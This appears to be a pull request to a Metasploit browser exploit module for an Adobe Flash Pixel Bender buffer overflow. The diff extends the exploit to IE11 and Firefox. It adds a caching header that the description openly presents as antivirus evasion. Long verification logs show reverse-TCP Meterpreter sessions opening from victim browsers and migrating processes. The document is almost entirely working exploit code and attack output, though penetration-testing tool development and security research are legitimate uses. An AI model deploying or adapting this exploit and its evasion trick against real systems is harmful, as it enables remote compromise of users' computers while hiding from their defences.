### PR TITLE
Fix adobe_flash_pixel_bender_bof to work on IE11 (+ simple AV-evasion)

### DIFF
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
         vulnerability occurs in the flash.Display.Shader class, when setting specially
         crafted data as its bytecode, as exploited in the wild in April 2014. This module
-        has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
-        Windows XP SP3, Windows 7 SP1 and Windows 8.
+        has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
+        over Windows XP SP3, Windows 7 SP1 and Windows 8.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
-          :method  => "LoadMovie",
+          #:clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+          #:method  => "LoadMovie",
           :os_name => Msf::OperatingSystems::WINDOWS,
-          :ua_name => Msf::HttpClients::IE,
+          #:ua_name => Msf::HttpClients::IE,
           :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
         },
       'Targets'        =>
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if request.uri =~ /\.swf$/
       print_status("Sending SWF...")
-      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
       return
     end
 
@@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <param name="allowScriptAccess" value="always" />
     <param name="FlashVars" value="sh=<%=flash_payload%>" />
     <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
     </object>
     </body>
     </html>


### PR DESCRIPTION
Updates to adobe_flash_pixel_bender_bof:
1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method).
2. Added `Cache-Control: no-store, no-cache` HTTP response header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :).

Testing performed:
- Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.)
- Successfully evaded AV-detection by setting  on Windows 7 SP1 running Microsoft Security Essentials.
## Verification
- [x] Exploit Flash 13.0.0.182 with IE 11 on Windows 7.

```
msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof 
msf exploit(adobe_flash_pixel_bender_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(adobe_flash_pixel_bender_bof) > set VERBOSE true 
VERBOSE => true
msf exploit(adobe_flash_pixel_bender_bof) > show options 

Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.1      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(adobe_flash_pixel_bender_bof) > exploit 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.1:4444 
[*] Using URL: http://0.0.0.0:8080/foNNWr3
[*]  Local IP: http://10.0.2.15:8080/foNNWr3
[*] Server started.
msf exploit(adobe_flash_pixel_bender_bof) > [*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - No cookie received, resorting to headers hash.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Gathering target information.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Info receiver page called.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'HZxIdkfXRRYXFgUILn'.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received sniffed browser data over POST: 
{"os_name"=>["Microsoft Windows"], "os_flavor"=>["7"], "ua_name"=>["MSIE"], "ua_ver"=>["11.0"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["13.0.0.182"]}.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'HZxIdkfXRRYXFgUILn'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag HZxIdkfXRRYXFgUILn
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "HZxIdkfXRRYXFgUILn" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0xbd66cfc@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:57 (lambda)> vs k=13.0.0.182
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /foNNWr3/vhuncr/
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending HTML...
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'HZxIdkfXRRYXFgUILn'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'HZxIdkfXRRYXFgUILn'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag HZxIdkfXRRYXFgUILn
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "HZxIdkfXRRYXFgUILn" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0xbd66cfc@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:57 (lambda)> vs k=13.0.0.182
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /foNNWr3/vhuncr/qLTO.swf
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 192.168.0.146
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.146:49254) at 2014-05-18 23:38:29 +0200
[*] Session ID 1 (192.168.0.1:4444 -> 192.168.0.146:49254) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (852)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2532
[+] Successfully migrated to process 

msf exploit(adobe_flash_pixel_bender_bof) > 
```
- [x] Exploit Flash 13.0.0.182 with Firefox 29 on Windows 7.

```
msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof 
msf exploit(adobe_flash_pixel_bender_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(adobe_flash_pixel_bender_bof) > set VERBOSE true 
VERBOSE => true
msf exploit(adobe_flash_pixel_bender_bof) > show options 

Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.1      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(adobe_flash_pixel_bender_bof) > exploit 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.1:4444 
[*] Using URL: http://0.0.0.0:8080/ITFvZe
[*]  Local IP: http://10.0.2.15:8080/ITFvZe
[*] Server started.
msf exploit(adobe_flash_pixel_bender_bof) > [*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - No cookie received, resorting to headers hash.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Gathering target information.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Info receiver page called.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'ICJLa'.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received sniffed browser data over POST: 
{"os_name"=>["Microsoft Windows"], "os_flavor"=>["7"], "ua_name"=>["Firefox"], "ua_ver"=>["28.0"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["13.0"]}.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'ICJLa'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag ICJLa
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "ICJLa" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0x10efe3bc@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:57 (lambda)> vs k=13.0
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /ITFvZe/bOJvpT/
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending HTML...
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'ICJLa'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'ICJLa'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag ICJLa
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "ICJLa" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0x10efe3bc@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:57 (lambda)> vs k=13.0
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /ITFvZe/bOJvpT/VtvAN.swf
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 192.168.0.146
[*] Meterpreter session 2 opened (192.168.0.1:4444 -> 192.168.0.146:49264) at 2014-05-18 23:46:47 +0200
[*] Session ID 2 (192.168.0.1:4444 -> 192.168.0.146:49264) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: FlashPlayerPlugin_13_0_0_182.exe (588)
[*] Spawning notepad.exe process to migrate to

msf exploit(adobe_flash_pixel_bender_bof) > 
```

NOTE: Privileges are limited in Firefox due to sandboxing of plugins. Meterpreter payload cannot upload, execute or migrate.

```
meterpreter > execute -f calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
```
- [x] Exploit Flash 13.0.0.182 with IE 10 on Windows 7.

```
msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof 
msf exploit(adobe_flash_pixel_bender_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(adobe_flash_pixel_bender_bof) > set VERBOSE true 
VERBOSE => true
msf exploit(adobe_flash_pixel_bender_bof) > exploit 
[*] Exploit running as background job.

[-] Handler failed to bind to 192.168.0.1:4444
[*] Started reverse handler on 0.0.0.0:4444 
[*] Using URL: http://0.0.0.0:8080/7lC4c5N
[*]  Local IP: http://127.0.0.1:8080/7lC4c5N
[*] Server started.
msf exploit(adobe_flash_pixel_bender_bof) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf exploit(adobe_flash_pixel_bender_bof) > back
msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof 
msf exploit(adobe_flash_pixel_bender_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(adobe_flash_pixel_bender_bof) > set VERBOSE true 
VERBOSE => true
msf exploit(adobe_flash_pixel_bender_bof) > show options 

Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.1      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(adobe_flash_pixel_bender_bof) > exploit 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.1:4444 
[*] Using URL: http://0.0.0.0:8080/viA08HIb
[*]  Local IP: http://127.0.0.1:8080/viA08HIb
[*] Server started.
msf exploit(adobe_flash_pixel_bender_bof) > [*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - No cookie received, resorting to headers hash.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Gathering target information.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Info receiver page called.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'JSZfBqgGRtakDdSYCUc'.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received sniffed browser data over POST: 
{"os_name"=>["Microsoft Windows"], "os_flavor"=>["7"], "ua_name"=>["MSIE"], "ua_ver"=>["10.0"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["13.0.0.182"], "office"=>["null"], "mshtml_build"=>["16866"]}.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'JSZfBqgGRtakDdSYCUc'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag JSZfBqgGRtakDdSYCUc
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "JSZfBqgGRtakDdSYCUc" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0x114f49ec@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:57 (lambda)> vs k=13.0.0.182
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /viA08HIb/rOxNxp/
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending HTML...
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'JSZfBqgGRtakDdSYCUc'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'JSZfBqgGRtakDdSYCUc'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag JSZfBqgGRtakDdSYCUc
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "JSZfBqgGRtakDdSYCUc" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0x114f49ec@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:57 (lambda)> vs k=13.0.0.182
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /viA08HIb/rOxNxp/jjDWc.swf
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 192.168.0.146
[*] Meterpreter session 3 opened (192.168.0.1:4444 -> 192.168.0.146:49194) at 2014-05-19 00:17:27 +0200
[*] Session ID 3 (192.168.0.1:4444 -> 192.168.0.146:49194) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1964)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2024
[+] Successfully migrated to process 

msf exploit(adobe_flash_pixel_bender_bof) > 
```
